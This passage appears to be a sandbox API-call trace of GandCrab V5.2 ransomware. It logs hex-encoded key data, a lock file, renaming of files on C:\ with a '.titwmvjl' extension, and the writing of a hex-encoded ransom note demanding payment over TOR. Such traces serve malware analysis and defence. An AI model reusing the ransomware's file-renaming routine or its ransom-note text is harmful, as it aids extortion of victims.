\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.511] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.513] CloseHandle (hObject=0x218) returned 1 [0067.513] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.513] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.514] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x334)) [0067.514] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.514] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.514] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.514] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Documents and Settings\\d2ca4a09d2ca4deb61a.lock") returned 50 [0067.514] CreateFileW (lpFileName="C:\\Documents and Settings\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\documents and settings\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x218 [0067.515] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.515] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.515] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0067.516] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*" | out: lpString1="C:\\Documents and Settings\\*") returned="C:\\Documents and Settings\\*" [0067.516] FindFirstFileExW (in: lpFileName="C:\\Documents and Settings\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0xffffffff [0067.516] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0xffffffff [0067.516] CloseHandle (hObject=0x218) returned 1 [0067.516] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.516] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0067.516] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0067.516] lstrcatW (in: lpString1="C:\\", lpString2="hiberfil.sys" | out: lpString1="C:\\hiberfil.sys") returned="C:\\hiberfil.sys" [0067.516] lstrlenW (lpString=".titwmvjl") returned 9 [0067.516] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0067.516] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.516] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\hiberfil.sys.titwmvjl") returned 24 [0067.516] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0067.517] lstrlenW (lpString=".sys") returned 4 [0067.517] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.517] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".sys ") returned 5 [0067.517] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.517] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.517] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.517] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0067.517] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0067.517] lstrcatW (in: lpString1="C:\\", lpString2="pagefile.sys" | out: lpString1="C:\\pagefile.sys") returned="C:\\pagefile.sys" [0067.517] lstrlenW (lpString=".titwmvjl") returned 9 [0067.517] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0067.517] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.517] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\pagefile.sys.titwmvjl") returned 24 [0067.517] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0067.517] lstrlenW (lpString=".sys") returned 4 [0067.517] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.518] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".sys ") returned 5 [0067.518] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.518] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.518] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.518] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0067.518] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0067.518] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0067.518] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0067.518] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.519] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.519] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.519] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.519] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.519] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.519] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\PerfLogs\\\\TITWMVJL-DECRYPT.txt") returned 33 [0067.519] CreateFileW (lpFileName="C:\\PerfLogs\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\perflogs\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.520] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x